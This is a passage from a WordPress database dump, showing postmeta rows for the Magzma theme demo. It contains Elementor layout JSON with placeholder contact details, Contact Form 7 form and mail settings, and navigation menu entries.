",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-head-title\"},{\"id\":\"cqqjhya\",\"elType\":\"widget\",\"settings\":{\"section_title\":\"\",\"html\":\"<p style=\\\"font-size: 16px; color: #999999;\\\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below.\\u00a0Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Telephone :<\\/strong> +0028 55 67 67<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Email :<\\/strong> jennier_aster@yourdomain.com<\\/p>\\n\\n<p style=\\\"font-size: 16px; color: #999999;\\\"><strong>Address :<\\/strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States<\\/p>\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"html\"}],\"isInner\":false}],\"isInner\":false}]'),(500,362,'_elementor_version','0.4'),(501,363,'_wp_page_template','default'),(502,363,'use_wrapper_space','1'),(503,363,'_use_wrapper_space','field_5858a5302ab1a'),(504,363,'hide_title','1'),(505,363,'_hide_title','field_5629b0afab2ef'),(506,363,'_elementor_edit_mode','builder'),(507,363,'_elementor_data','[{\"id\":\"hvualcf\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea4pbwe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"al1dqdi\",\"elType\":\"widget\",\"settings\":{\"title\":\"+224 625 27 22 90\",\"header_size\":\"h3\",\"title_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"jur7buq\",\"elType\":\"widget\",\"settings\":{\"title\":\"+224 664 61 36 77\",\"header_size\":\"h3\",\"title_color\":\"#7a7a7a\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p247jom\",\"elType\":\"widget\",\"settings\":{\"address\":\"kaloum\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false},{\"id\":\"qlp485n\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"vymi2q5\",\"elType\":\"widget\",\"settings\":{\"form_select\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false}],\"isInner\":false}]'),(508,363,'_elementor_version','0.4'),(812,4,'_form','<div id=\"contact\"  class=\"transparent\">\n<div class=\"form\">\n<div class=\"border\">\n[text* name id:name placeholder \"Name\"]\n[text* email id:email placeholder \"Email\"]\n[text* subject id:subject placeholder \"Subject\"]\n<br>\n[textarea message 45x8 id:message-form placeholder \"Message Here\"]\n[submit class:submit \"Send\"]\n</div>\n</div>\n</div>'),(813,4,'_mail','a:8:{s:7:\"subject\";s:23:\"Demo 7 \"[your-subject]\"\";s:6:\"sender\";s:35:\"[your-name] <wordpress@192.168.1.7>\";s:4:\"body\";s:167:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\";s:9:\"recipient\";s:29:\"admin.themesawesome@gmail.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(814,4,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Demo 7 \"[your-subject]\"\";s:6:\"sender\";s:30:\"Demo 7 <wordpress@192.168.1.7>\";s:4:\"body\";s:109:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Demo 7 (http://demo7.magzma.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:39:\"Reply-To: admin.themesawesome@gmail.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(815,4,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:14:\"date_too_early\";s:44:\"The date is before the earliest one allowed.\";s:13:\"date_too_late\";s:41:\"The date is after the latest one allowed.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";}'),(816,4,'_additional_settings',''),(817,4,'_locale','en_US'),(818,4,'_config_errors','a:1:{s:23:\"mail.additional_headers\";a:1:{i:0;a:2:{s:4:\"code\";i:102;s:4:\"args\";a:3:{s:7:\"message\";s:34:\"The %name% field value is invalid.\";s:6:\"params\";a:1:{s:4:\"name\";s:8:\"Reply-To\";}s:4:\"link\";s:90:\"http://contactform7.com/configuration-errors/#mail.additional_headers:error_invalid_syntax\";}}}}'),(970,360,'_edit_lock','1511783359:1'),(971,360,'_edit_last','1'),(972,2,'_edit_lock','1511347509:1'),(973,2,'_edit_last','1'),(974,378,'_edit_last','1'),(975,378,'_wp_page_template','default'),(976,378,'_edit_lock','1509551205:1'),(977,380,'_edit_last','1'),(978,380,'_edit_lock','1509550659:1'),(979,380,'_wp_page_template','default'),(980,359,'_edit_lock','1509552633:1'),(981,359,'_edit_last','1'),(982,383,'_edit_last','1'),(983,383,'_wp_page_template','default'),(984,383,'_edit_lock','1509551546:1'),(985,385,'_edit_last','1'),(986,385,'_wp_page_template','default'),(987,385,'_edit_lock','1509551856:1'),(991,388,'_menu_item_type','post_type'),(992,388,'_menu_item_menu_item_parent','0'),(993,388,'_menu_item_object_id','385'),(994,388,'_menu_item_object','page'),(995,388,'_menu_item_target',''),(996,388,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(997,388,'_menu_item_xfn',''),(998,388,'_menu_item_url',''),(1000,389,'_menu_item_type','post_type'),(1001,389,'_menu_item_menu_item_parent','0'),(1002,389,'_menu_item_object_id','383'),(1003,389,'_menu_item_object','page'),(1004,389,'_menu_item_target',''),(1005,389,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1006,389,'_menu_item_xfn',''),(1007,389,'_menu_item_url',''),(1009,390,'_menu_item_type','post_type'),(1010,390,'_menu_item_menu_item_parent','0'),(1011,390,'_menu_item_object_id','380'),(1012,390,'_menu_item_object','page'),(1013,390,'_menu_item_target',''),(1014,390,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1015,390,'_menu_item_xfn',''),(1016,390,'_menu_item_url',''),(1018,391,'_menu_item_type','post_type'),(1019,391,'_menu_item_menu_item_parent','0'),(1020,391,'_menu_item_object_id','378'),(1021,391,'_menu_item_object','page'),(1022,391,'_menu_item_target',''),(1023,391,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1024,391,'_menu_item_xfn',''),(1025,391,'_menu_item_url',''),(1027,392,'_menu_item_type','post_type'),(1028,392,'_menu_item_menu_item_parent','0'),(1029,392,'_menu_item_object_id','2'),(1030,392,'_menu_item_object','page'),(1031,392,'_menu_item_target',''),(1032,392,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1033,392,'_menu_item_xfn',''),(1034,392,'_menu_item_url',''),(1036,393,'_menu_item_type','post_type'),(1037,393,'_menu_item_menu_item_parent','0'),(1038,393,'_menu_item_object_id','360'),(1039,393,'_menu_item_object','page'),(1040,393,'_menu_item_target',''),(1041,393,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1042,393,'_menu_item_xfn',''),(1043,393,'_menu_item_url',''),(1065,399,'_elementor_edit_mode','builder'),(1066,399,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"3\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"12\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"5\",\"category\":[\"11\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"7\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"